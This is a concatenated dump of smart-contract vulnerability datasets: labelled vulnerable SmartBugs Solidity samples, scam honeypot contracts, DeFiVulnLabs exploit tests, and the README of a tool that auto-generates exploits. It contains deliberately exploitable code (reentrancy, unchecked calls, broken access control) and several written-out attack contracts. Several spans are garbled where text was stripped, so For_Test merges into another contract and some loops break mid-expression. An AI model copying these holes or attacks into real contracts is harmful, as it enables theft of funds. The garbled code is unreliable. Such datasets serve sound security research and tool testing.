| function withdraw() public { 26 | require(balances[msg.sender] > 0); 27 | require(now > lockTime[msg.sender]); 28 | uint transferValue = balances[msg.sender]; 29 | balances[msg.sender] = 0; 30 | msg.sender.transfer(transferValue); 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/denial_of_service/dos_address.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/dos_gas_limit/dos_address.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 16,17,18 5 | */ 6 | 7 | pragma solidity ^0.4.25; 8 | 9 | contract DosGas { 10 | 11 | address[] creditorAddresses; 12 | bool win = false; 13 | 14 | function emptyCreditors() public { 15 | // DENIAL_OF_SERVICE 16 | if(creditorAddresses.length>1500) { 17 | creditorAddresses = new address[](0); 18 | win = true; 19 | } 20 | } 21 | 22 | function addCreditors() public returns (bool) { 23 | for(uint i=0;i<350;i++) { 24 | creditorAddresses.push(msg.sender); 25 | } 26 | return true; 27 | } 28 | 29 | function iWin() public view returns (bool) { 30 | return win; 31 | } 32 | 33 | function numberCreditors() public view returns (uint) { 34 | return creditorAddresses.length; 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/denial_of_service/send_loop.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://consensys.github.io/smart-contract-best-practices/known_attacks/#dos-with-unexpected-revert 3 | * @author: ConsenSys Diligence 4 | * @vulnerable_at_lines: 24 5 | * Modified by Bernhard Mueller 6 | */ 7 | 8 | pragma solidity 0.4.24; 9 | 10 | contract Refunder { 11 | 12 | address[] private refundAddresses; 13 | mapping (address => uint) public refunds; 14 | 15 | constructor() { 16 | refundAddresses.push(0x79B483371E87d664cd39491b5F06250165e4b184); 17 | refundAddresses.push(0x79B483371E87d664cd39491b5F06250165e4b185); 18 | } 19 | 20 | // bad 21 | function refundAll() public { 22 | for(uint x; x < refundAddresses.length; x++) { // arbitrary length iteration based on how many addresses participated 23 | // DENIAL_OF_SERVICE 24 | require(refundAddresses[x].send(refunds[refundAddresses[x]])); // doubly bad, now a single failure on send will hold up all funds 25 | } 26 | } 27 | 28 | } 29 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/bad_randomness/random_number_generator.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/weak_randomness/random_number_generator.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 12,18,20,22 5 | */ 6 | 7 | pragma solidity ^0.4.25; 8 | 9 | // Based on TheRun contract deployed at 0xcac337492149bDB66b088bf5914beDfBf78cCC18. 10 | contract RandomNumberGenerator { 11 | // BAD_RANDOMNESS 12 | uint256 private salt = block.timestamp; 13 | 14 | function random(uint max) view private returns (uint256 result) { 15 | // Get the best seed for randomness 16 | uint256 x = salt * 100 / max; 17 | // BAD_RANDOMNESS 18 | uint256 y = salt * block.number / (salt % 5); 19 | // BAD_RANDOMNESS 20 | uint256 seed = block.number / 3 + (salt % 300) + y; 21 | // BAD_RANDOMNESS 22 | uint256 h = uint256(blockhash(seed)); 23 | // Random number between 1 and max 24 | return uint256((h / x)) % max + 1; 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 31 5 | */ 6 | 7 | pragma solidity ^0.4.18; 8 | 9 | contract AirDropContract{ 10 | 11 | function AirDropContract() public { 12 | } 13 | 14 | modifier validAddress( address addr ) { 15 | require(addr != address(0x0)); 16 | require(addr != address(this)); 17 | _; 18 | } 19 | 20 | function transfer(address contract_address,address[] tos,uint[] vs) 21 | public 22 | validAddress(contract_address) 23 | returns (bool){ 24 | 25 | require(tos.length > 0); 26 | require(vs.length > 0); 27 | require(tos.length == vs.length); 28 | bytes4 id = bytes4(keccak256("transferFrom(address,address,uint256)")); 29 | for(uint i = 0 ; i < tos.length; i++){ 30 | // UNCHECKED_LL_CALLS 31 | contract_address.call(id, msg.sender, tos[i], vs[i]); 32 | } 33 | return true; 34 | } 35 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/etherstore.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/sigp/solidity-security-blog 3 | * @author: Suhabe Bugrara 4 | * @vulnerable_at_lines: 27 5 | */ 6 | 7 | //added pragma version 8 | pragma solidity ^0.4.0; 9 | 10 | contract EtherStore { 11 | 12 | uint256 public withdrawalLimit = 1 ether; 13 | mapping(address => uint256) public lastWithdrawTime; 14 | mapping(address => uint256) public balances; 15 | 16 | function depositFunds() public payable { 17 | balances[msg.sender] += msg.value; 18 | } 19 | 20 | function withdrawFunds (uint256 _weiToWithdraw) public { 21 | require(balances[msg.sender] >= _weiToWithdraw); 22 | // limit the withdrawal 23 | require(_weiToWithdraw <= withdrawalLimit); 24 | // limit the time allowed to withdraw 25 | require(now >= lastWithdrawTime[msg.sender] + 1 weeks); 26 | // REENTRANCY 27 | require(msg.sender.call.value(_weiToWithdraw)()); 28 | balances[msg.sender] -= _weiToWithdraw; 29 | lastWithdrawTime[msg.sender] = now; 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /datasets/Solidlity-Vulnerable/honeypots/For_Test.sol: -------------------------------------------------------------------------------- 1 | // https://etherscan.io/address/0x2eCF8D1F46DD3C2098de9352683444A0B69Eb229#code 2 | 3 | pragma solidity ^0.4.19; 4 | 5 | contract For_Test 6 | { 7 | address owner = msg.sender; 8 | 9 | function withdraw() 10 | payable 11 | public 12 | { 13 | require(msg.sender==owner); 14 | owner.transfer(this.balance); 15 | } 16 | 17 | function() payable {} 18 | 19 | function Test() 20 | payable 21 | public 22 | { 23 | if(msg.value> 0.1 ether) 24 | { 25 | uint256 multi =0; 26 | uint256 amountToTransfer=0; 27 | 28 | 29 | for(var i=0;i NameRecord) public registeredNameRecord; // records who registered names 18 | mapping(bytes32 => address) public resolve; // resolves hashes to addresses 19 | 20 | function register(bytes32 _name, address _mappedAddress) public { 21 | // set up the new NameRecord 22 | // OTHER - uninitialized storage 23 | NameRecord newRecord; 24 | newRecord.name = _name; 25 | newRecord.mappedAddress = _mappedAddress; 26 | 27 | resolve[_name] = _mappedAddress; 28 | registeredNameRecord[msg.sender] = newRecord; 29 | 30 | require(unlocked); // only allow registrations if contract is unlocked 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/reentrancy_bonus.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://consensys.github.io/smart-contract-best-practices/known_attacks/ 3 | * @author: consensys 4 | * @vulnerable_at_lines: 28 5 | */ 6 | 7 | pragma solidity ^0.4.0; 8 | 9 | contract Reentrancy_bonus{ 10 | 11 | // INSECURE 12 | mapping (address => uint) private userBalances; 13 | mapping (address => bool) private claimedBonus; 14 | mapping (address => uint) private rewardsForA; 15 | 16 | function withdrawReward(address recipient) public { 17 | uint amountToWithdraw = rewardsForA[recipient]; 18 | rewardsForA[recipient] = 0; 19 | (bool success, ) = recipient.call.value(amountToWithdraw)(""); 20 | require(success); 21 | } 22 | 23 | function getFirstWithdrawalBonus(address recipient) public { 24 | require(!claimedBonus[recipient]); // Each recipient should only be able to claim the bonus once 25 | 26 | rewardsForA[recipient] += 100; 27 | // REENTRANCY 28 | withdrawReward(recipient); // At this point, the caller will be able to execute getFirstWithdrawalBonus again. 29 | claimedBonus[recipient] = true; 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /datasets/Solidlity-Vulnerable/honeypots/KingOfTheHill.sol: -------------------------------------------------------------------------------- 1 | // https://etherscan.io/address/0x4dc76cfc65b14b3fd83c8bc8b895482f3cbc150a#code 2 | 3 | pragma solidity ^0.4.11; 4 | 5 | // Simple Game. Each time you send more than the current jackpot, you become 6 | // owner of the contract. As an owner, you can take the jackpot after a delay 7 | // of 5 days after the last payment. 8 | 9 | contract Owned { 10 | address owner; function Owned() { 11 | owner = msg.sender; 12 | } 13 | modifier onlyOwner{ 14 | if (msg.sender != owner) 15 | revert(); _; 16 | } 17 | } 18 | 19 | contract KingOfTheHill is Owned { 20 | address public owner; 21 | uint public jackpot; 22 | uint public withdrawDelay; 23 | 24 | function() public payable { 25 | // transfer contract ownership if player pay more than current jackpot 26 | if (msg.value > jackpot) { 27 | owner = msg.sender; 28 | withdrawDelay = block.timestamp + 5 days; 29 | } 30 | jackpot+=msg.value; 31 | } 32 | 33 | function takeAll() public onlyOwner { 34 | require(block.timestamp >= withdrawDelay); 35 | msg.sender.transfer(this.balance); 36 | jackpot=0; 37 | } 38 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/tokensalechallenge.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-101 // https://capturetheether.com/challenges/math/token-sale/ 3 | * @author: Steve Marx 4 | * @vulnerable_at_lines: 23,25,33 5 | */ 6 | 7 | pragma solidity ^0.4.21; 8 | 9 | contract TokenSaleChallenge { 10 | mapping(address => uint256) public balanceOf; 11 | uint256 constant PRICE_PER_TOKEN = 1 ether; 12 | 13 | function TokenSaleChallenge(address _player) public payable { 14 | require(msg.value == 1 ether); 15 | } 16 | 17 | function isComplete() public view returns (bool) { 18 | return address(this).balance < 1 ether; 19 | } 20 | 21 | function buy(uint256 numTokens) public payable { 22 | // ARITHMETIC 23 | require(msg.value == numTokens * PRICE_PER_TOKEN); 24 | // ARITHMETIC 25 | balanceOf[msg.sender] += numTokens; 26 | } 27 | 28 | function sell(uint256 numTokens) public { 29 | require(balanceOf[msg.sender] >= numTokens); 30 | 31 | balanceOf[msg.sender] -= numTokens; 32 | // ARITHMETIC 33 | msg.sender.transfer(numTokens * PRICE_PER_TOKEN); 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/arbitrary_location_write_simple.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-124#arbitrary-location-write-simplesol 3 | * @author: Suhabe Bugrara 4 | * @vulnerable_at_lines: 27 5 | */ 6 | 7 | pragma solidity ^0.4.25; 8 | 9 | contract Wallet { 10 | uint[] private bonusCodes; 11 | address private owner; 12 | 13 | constructor() public { 14 | bonusCodes = new uint[](0); 15 | owner = msg.sender; 16 | } 17 | 18 | function () public payable { 19 | } 20 | 21 | function PushBonusCode(uint c) public { 22 | bonusCodes.push(c); 23 | } 24 | 25 | function PopBonusCode() public { 26 | // ACCESS_CONTROL 27 | require(0 <= bonusCodes.length); // this condition is always true since array lengths are unsigned 28 | bonusCodes.length--; // an underflow can be caused here 29 | } 30 | 31 | function UpdateBonusCodeAt(uint idx, uint c) public { 32 | require(idx < bonusCodes.length); 33 | bonusCodes[idx] = c; // write to any index less than bonusCodes.length 34 | } 35 | 36 | function Destroy() public { 37 | require(msg.sender == owner); 38 | selfdestruct(msg.sender); 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/front_running/odds_and_evens.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: http://blockchain.unica.it/projects/ethereum-survey/attacks.html#oddsandevens 3 | * @author: - 4 | * @vulnerable_at_lines: 25,28 5 | */ 6 | 7 | pragma solidity ^0.4.2; 8 | 9 | contract OddsAndEvens{ 10 | 11 | struct Player { 12 | address addr; 13 | uint number; 14 | } 15 | 16 | Player[2] public players; //public only for debug purpose 17 | 18 | uint8 tot; 19 | address owner; 20 | 21 | function OddsAndEvens() { 22 | owner = msg.sender; 23 | } 24 | // FRONT_RUNNING 25 | function play(uint number) payable{ 26 | if (msg.value != 1 ether) throw; 27 | // FRONT_RUNNING 28 | players[tot] = Player(msg.sender, number); 29 | tot++; 30 | 31 | if (tot==2) andTheWinnerIs(); 32 | } 33 | 34 | function andTheWinnerIs() private { 35 | bool res ; 36 | uint n = players[0].number+players[1].number; 37 | if (n%2==0) { 38 | res = players[0].addr.send(1800 finney); 39 | } 40 | else { 41 | res = players[1].addr.send(1800 finney); 42 | } 43 | 44 | delete players; 45 | tot=0; 46 | } 47 | 48 | function getProfit() { 49 | if(msg.sender!=owner) throw; 50 | bool res = msg.sender.send(this.balance); 51 | } 52 | 53 | } 54 | -------------------------------------------------------------------------------- /datasets/Solidlity-Vulnerable/honeypots/RichestTakeAll.sol: -------------------------------------------------------------------------------- 1 | // https://etherscan.io/address/0xe65c53087e1a40b7c53b9a0ea3c2562ae2dfeb24 2 | 3 | pragma solidity ^0.4.18; 4 | 5 | // Simple Game. Each time you send more than the current jackpot, you become 6 | // owner of the contract. As an owner, you can take the jackpot after a delay 7 | // of 5 days after the last payment. 8 | 9 | contract Owned { 10 | address public owner; 11 | 12 | function Owned() { 13 | owner = msg.sender; 14 | } 15 | 16 | modifier onlyOwner{ 17 | if (msg.sender != owner) 18 | revert(); 19 | _; 20 | } 21 | } 22 | 23 | contract RichestTakeAll is Owned { 24 | address public owner; 25 | uint public jackpot; 26 | uint public withdrawDelay; 27 | 28 | function() public payable { 29 | // transfer contract ownership if player pay more than current jackpot 30 | if (msg.value >= jackpot) { 31 | owner = msg.sender; 32 | withdrawDelay = block.timestamp + 5 days; 33 | } 34 | 35 | jackpot += msg.value; 36 | } 37 | 38 | function takeAll() public onlyOwner { 39 | require(block.timestamp >= withdrawDelay); 40 | 41 | msg.sender.transfer(jackpot); 42 | 43 | // restart 44 | jackpot = 0; 45 | } 46 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 14 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | contract Proxy { 10 | modifier onlyOwner { if (msg.sender == Owner) _; } address Owner = msg.sender; 11 | function transferOwner(address _owner) public onlyOwner { Owner = _owner; } 12 | function proxy(address target, bytes data) public payable { 13 | // UNCHECKED_LL_CALLS 14 | target.call.value(msg.value)(data); 15 | } 16 | } 17 | 18 | contract VaultProxy is Proxy { 19 | address public Owner; 20 | mapping (address => uint256) public Deposits; 21 | 22 | function () public payable { } 23 | 24 | function Vault() public payable { 25 | if (msg.sender == tx.origin) { 26 | Owner = msg.sender; 27 | deposit(); 28 | } 29 | } 30 | 31 | function deposit() public payable { 32 | if (msg.value > 0.5 ether) { 33 | Deposits[msg.sender] += msg.value; 34 | } 35 | } 36 | 37 | function withdraw(uint256 amount) public onlyOwner { 38 | if (amount>0 && Deposits[msg.sender]>=amount) { 39 | msg.sender.transfer(amount); 40 | } 41 | } 42 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 14 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | contract Proxy { 10 | modifier onlyOwner { if (msg.sender == Owner) _; } address Owner = msg.sender; 11 | function transferOwner(address _owner) public onlyOwner { Owner = _owner; } 12 | function proxy(address target, bytes data) public payable { 13 | // UNCHECKED_LL_CALLS 14 | target.call.value(msg.value)(data); 15 | } 16 | } 17 | 18 | contract DepositProxy is Proxy { 19 | address public Owner; 20 | mapping (address => uint256) public Deposits; 21 | 22 | function () public payable { } 23 | 24 | function Vault() public payable { 25 | if (msg.sender == tx.origin) { 26 | Owner = msg.sender; 27 | deposit(); 28 | } 29 | } 30 | 31 | function deposit() public payable { 32 | if (msg.value > 0.5 ether) { 33 | Deposits[msg.sender] += msg.value; 34 | } 35 | } 36 | 37 | function withdraw(uint256 amount) public onlyOwner { 38 | if (amount>0 && Deposits[msg.sender]>=amount) { 39 | msg.sender.transfer(amount); 40 | } 41 | } 42 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 14 5 | */ 6 | 7 | pragma solidity ^0.4.23; 8 | 9 | contract Proxy { 10 | modifier onlyOwner { if (msg.sender == Owner) _; } address Owner = msg.sender; 11 | function transferOwner(address _owner) public onlyOwner { Owner = _owner; } 12 | function proxy(address target, bytes data) public payable { 13 | // UNCHECKED_LL_CALLS 14 | target.call.value(msg.value)(data); 15 | } 16 | } 17 | 18 | contract VaultProxy is Proxy { 19 | address public Owner; 20 | mapping (address => uint256) public Deposits; 21 | 22 | function () public payable { } 23 | 24 | function Vault() public payable { 25 | if (msg.sender == tx.origin) { 26 | Owner = msg.sender; 27 | deposit(); 28 | } 29 | } 30 | 31 | function deposit() public payable { 32 | if (msg.value > 0.25 ether) { 33 | Deposits[msg.sender] += msg.value; 34 | } 35 | } 36 | 37 | function withdraw(uint256 amount) public onlyOwner { 38 | if (amount>0 && Deposits[msg.sender]>=amount) { 39 | msg.sender.transfer(amount); 40 | } 41 | } 42 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/wallet_03_wrong_constructor.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-105#wallet-03-wrong-constructorsol 3 | * @author: - 4 | * @vulnerable_at_lines: 19,20 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | /* User can add pay in and withdraw Ether. 10 | The constructor is wrongly named, so anyone can become 'creator' and withdraw all funds. 11 | */ 12 | 13 | contract Wallet { 14 | address creator; 15 | 16 | mapping(address => uint256) balances; 17 | 18 | // ACCESS_CONTROL 19 | function initWallet() public { 20 | creator = msg.sender; 21 | } 22 | 23 | function deposit() public payable { 24 | assert(balances[msg.sender] + msg.value > balances[msg.sender]); 25 | balances[msg.sender] += msg.value; 26 | } 27 | 28 | function withdraw(uint256 amount) public { 29 | require(amount <= balances[msg.sender]); 30 | msg.sender.transfer(amount); 31 | balances[msg.sender] -= amount; 32 | } 33 | 34 | // In an emergency the owner can migrate allfunds to a different address. 35 | 36 | function migrateTo(address to) public { 37 | require(creator == msg.sender); 38 | to.transfer(this.balance); 39 | } 40 | 41 | } 42 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Polymer 2 | 3 | Is powered by insomnia & laziness, a lot of the code was written by ChatGPT. 4 | 5 | ## Example Usage 6 | 7 | In this example we use the Z3 analyzer to find inputs to exploit a contract. This is from an integer overflow example contract at: https://github.com/shamb0/ssec-swc-101-int-ouflow 8 | 9 | #### Load contracts from the repository 10 | ![1](screenshots/1.png "Screenshot 1") 11 | 12 | #### Select which files to analyze 13 | ![2](screenshots/2.png "Screenshot 2") 14 | 15 | #### Uncheck code which statements you want to include or exclude, and the analyzer prompt 16 | ![3](screenshots/3.png "Screenshot 3") 17 | 18 | #### See that it generates an exploit and runs it to get results 19 | ![4](screenshots/4.png "Screenshot 4") 20 | 21 | ## Building & Running 22 | 23 | This project needs to run things inside Docker, so the top-level project may not be easy to run Docker inside a Docker. 24 | 25 | To install requirements then run the API do: 26 | 27 | ```shell 28 | $ apt-get install make python3-pip 29 | $ make python-requirements docker-build 30 | $ make api 31 | ``` 32 | 33 | ## Resources 34 | 35 | * https://swcregistry.io/ 36 | * https://www.dasp.co/ 37 | * https://consensys.github.io/smart-contract-best-practices/ 38 | 39 | ## Repos for testing 40 | 41 | * https://github.com/shamb0/ssec-swc-101-int-ouflow 42 | -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Selfdestruct2.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | /* 7 | Try to send ether to Force contract 8 | Force implements neither receive nor fallaback functions. Calls with any value will revert. 9 | */ 10 | 11 | contract ContractTest is Test { 12 | Force ForceContract; 13 | Attack AttackerContract; 14 | 15 | function testselfdestruct2() public { 16 | 17 | 18 | ForceContract = new Force(); 19 | console.log("Balance of ForceContract:", address(this).balance); 20 | AttackerContract = new Attack(); 21 | console.log("Balance of ForceContract:", address(ForceContract).balance); 22 | console.log("Balance of AttackerContract:", address(AttackerContract).balance); 23 | AttackerContract.attack{value: 1 ether}(address(ForceContract)); 24 | 25 | console.log("Exploit completed"); 26 | console.log("Balance of EtherGameContract:", address(ForceContract).balance); 27 | } 28 | receive() payable external{} 29 | } 30 | 31 | contract Force {/* 32 | 33 | MEOW ? 34 | /\_/\ / 35 | ____/ o o \ 36 | /~____ =ø= / 37 | (______)__m_m) 38 | 39 | */} 40 | 41 | 42 | contract Attack { 43 | 44 | function attack(address force) public payable { 45 | selfdestruct(payable(force)); 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/front_running/README.md: -------------------------------------------------------------------------------- 1 | # Front Running 2 | Also known as time-of-check vs time-of-use (TOCTOU), race condition, transaction ordering dependence (TOD). 3 | 4 | Since miners always get rewarded via gas fees for running code on behalf of externally owned addresses (EOA), users can specify higher fees to have their transactions mined more quickly. Since the Ethereum blockchain is public, everyone can see the contents of others' pending transactions. This means if a given user is revealing the solution to a puzzle or other valuable secret, a malicious user can steal the solution and copy their transaction with higher fees to preempt the original solution. If developers of smart contracts are not careful, this situation can lead to practical and devastating front-running attacks. 5 | 6 | ## Attack Scenario 7 | A smart contract publishes an RSA number (N = prime1 x prime2). 8 | A call to its submitSolution() public function with the right prime1 and prime2 rewards the caller. 9 | Alice successfuly factors the RSA number and submits a solution. 10 | Someone on the network sees Alice's transaction (containing the solution) waiting to be mined and submits it with a higher gas price. 11 | The second transaction gets picked up first by miners due to the higher paid fee. The attacker wins the prize. 12 | 13 | ## References 14 | Taken from [DASP TOP10](https://dasp.co/) -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/wallet_04_confused_sign.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-105#wallet-04-confused-signsol 3 | * @author: - 4 | * @vulnerable_at_lines: 30 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | /* User can add pay in and withdraw Ether. 10 | Unfortunatelty, the developer was drunk and used the wrong comparison operator in "withdraw()" 11 | Anybody can withdraw arbitrary amounts of Ether :() 12 | */ 13 | 14 | contract Wallet { 15 | address creator; 16 | 17 | mapping(address => uint256) balances; 18 | 19 | constructor() public { 20 | creator = msg.sender; 21 | } 22 | 23 | function deposit() public payable { 24 | assert(balances[msg.sender] + msg.value > balances[msg.sender]); 25 | balances[msg.sender] += msg.value; 26 | } 27 | 28 | function withdraw(uint256 amount) public { 29 | // ACCESS_CONTROL 30 | require(amount >= balances[msg.sender]); 31 | msg.sender.transfer(amount); 32 | balances[msg.sender] -= amount; 33 | } 34 | 35 | // In an emergency the owner can migrate allfunds to a different address. 36 | 37 | function migrateTo(address to) public { 38 | require(creator == msg.sender); 39 | to.transfer(this.balance); 40 | } 41 | 42 | } 43 | -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Storage-collision.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | contract ContractTest is Test { 7 | Logic LogicContract; 8 | Proxy ProxyContract; 9 | 10 | function testStorageCollision() public { 11 | 12 | LogicContract = new Logic(); 13 | ProxyContract = new Proxy(address(LogicContract)); 14 | 15 | console.log("Current implementation contract address:",ProxyContract.implementation()); 16 | ProxyContract.testcollision(); 17 | console.log("Overwrited slot0 implementation contract address:",ProxyContract.implementation()); 18 | console.log("Exploit completed"); 19 | } 20 | receive() payable external{} 21 | } 22 | 23 | contract Proxy { 24 | address public implementation; //slot0 25 | 26 | constructor (address _implementation) public { 27 | implementation = _implementation; 28 | } 29 | 30 | function testcollision() public { 31 | implementation.delegatecall( 32 | abi.encodeWithSignature("foo(address)",address(this)) 33 | ); 34 | } 35 | } 36 | 37 | contract Logic { 38 | address public GuestAddress; //slot0 39 | 40 | constructor () public { 41 | GuestAddress = address(0x0); 42 | } 43 | 44 | function foo(address _addr) public { 45 | GuestAddress = _addr; 46 | } 47 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/denial_of_service/dos_number.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/dos_gas_limit/dos_number.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 18,19,20,21,22 5 | */ 6 | 7 | pragma solidity ^0.4.25; 8 | 9 | contract DosNumber { 10 | 11 | uint numElements = 0; 12 | uint[] array; 13 | 14 | function insertNnumbers(uint value,uint numbers) public { 15 | 16 | // Gas DOS if number > 382 more or less, it depends on actual gas limit 17 | // DENIAL_OF_SERVICE 18 | for(uint i=0;i1500); 28 | numElements = 0; 29 | } 30 | 31 | // Gas DOS clear 32 | function clearDOS() public { 33 | 34 | // number depends on actual gas limit 35 | require(numElements>1500); 36 | array = new uint[](0); 37 | numElements = 0; 38 | } 39 | 40 | function getLengthArray() public view returns(uint) { 41 | return numElements; 42 | } 43 | 44 | function getRealLengthArray() public view returns(uint) { 45 | return array.length; 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/time_manipulation/governmental_survey.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: http://blockchain.unica.it/projects/ethereum-survey/attacks.html#governmental 3 | * @author: - 4 | * @vulnerable_at_lines: 27 5 | */ 6 | 7 | //added pragma version 8 | pragma solidity ^0.4.0; 9 | 10 | contract Governmental { 11 | address public owner; 12 | address public lastInvestor; 13 | uint public jackpot = 1 ether; 14 | uint public lastInvestmentTimestamp; 15 | uint public ONE_MINUTE = 1 minutes; 16 | 17 | function Governmental() { 18 | owner = msg.sender; 19 | if (msg.value<1 ether) throw; 20 | } 21 | 22 | function invest() { 23 | if (msg.value TIME_MANIPULATION 27 | lastInvestmentTimestamp = block.timestamp; 28 | } 29 | 30 | function resetInvestment() { 31 | if (block.timestamp < lastInvestmentTimestamp+ONE_MINUTE) 32 | throw; 33 | 34 | lastInvestor.send(jackpot); 35 | owner.send(this.balance-1 ether); 36 | 37 | lastInvestor = 0; 38 | jackpot = 1 ether; 39 | lastInvestmentTimestamp = 0; 40 | } 41 | } 42 | 43 | contract Attacker { 44 | 45 | function attack(address target, uint count) { 46 | if (0<=count && count<1023) { 47 | this.attack.gas(msg.gas-2000)(target, count+1); 48 | } 49 | else { 50 | Governmental(target).resetInvestment(); 51 | } 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Returnvalue.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.0; 3 | 4 | import "forge-std/Test.sol"; 5 | import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol"; 6 | 7 | interface USDT { 8 | function transfer(address to, uint256 value) external; 9 | 10 | function balanceOf(address account) external view returns (uint256); 11 | 12 | function approve(address spender, uint256 value) external; 13 | } 14 | interface CheatCodes { 15 | function startPrank(address) external; 16 | function stopPrank() external; 17 | function createSelectFork(string calldata,uint256) external returns(uint256); 18 | } 19 | 20 | contract ContractTest is DSTest { 21 | using SafeERC20 for IERC20; 22 | IERC20 constant usdt = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7); 23 | CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); 24 | 25 | 26 | function setUp() public { 27 | cheats.createSelectFork("mainnet", 16138254); 28 | } 29 | 30 | function testTransfer() public { 31 | cheats.startPrank(0xef0DCc839c1490cEbC7209BAa11f46cfe83805ab); 32 | usdt.transfer(address(this),123); 33 | cheats.stopPrank(); 34 | } 35 | 36 | function testSafeTransfer() public { 37 | cheats.startPrank(0xef0DCc839c1490cEbC7209BAa11f46cfe83805ab); 38 | usdt.safeTransfer(address(this),123); 39 | cheats.stopPrank(); 40 | } 41 | 42 | receive() payable external{} 43 | 44 | } 45 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/README.md: -------------------------------------------------------------------------------- 1 | # Unchecked Low Level Calls 2 | Also known as or related to silent failing sends, unchecked-send. 3 | 4 | One of the deeper features of Solidity are the low level functions call(), callcode(), delegatecall() and send(). Their behavior in accounting for errors is quite different from other Solidity functions, as they will not propagate (or bubble up) and will not lead to a total reversion of the current execution. Instead, they will return a boolean value set to false, and the code will continue to run. This can surprise developers and, if the return value of such low-level calls are not checked, can lead to fail-opens and other unwanted outcomes. Remember, send can fail! 5 | 6 | ## Examples 7 | The following code is an example of what can go wrong when one forgets to check the return value of send(). If the call is used to send ether to a smart contract that does not accept them (e.g. because it does not have a payable fallback function), the EVM will replace its return value with false. Since the return value is not checked in our example, the function's changes to the contract state will not be reverted, and the etherLeft variable will end up tracking an incorrect value: 8 | ``` 9 | function withdraw(uint256 _amount) public { 10 | require(balances[msg.sender] >= _amount); 11 | balances[msg.sender] -= _amount; 12 | etherLeft -= _amount; 13 | msg.sender.send(_amount); 14 | } 15 | ``` 16 | 17 | ## References 18 | Taken from [DASP TOP10](https://dasp.co/) -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/wallet_02_refund_nosub.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: 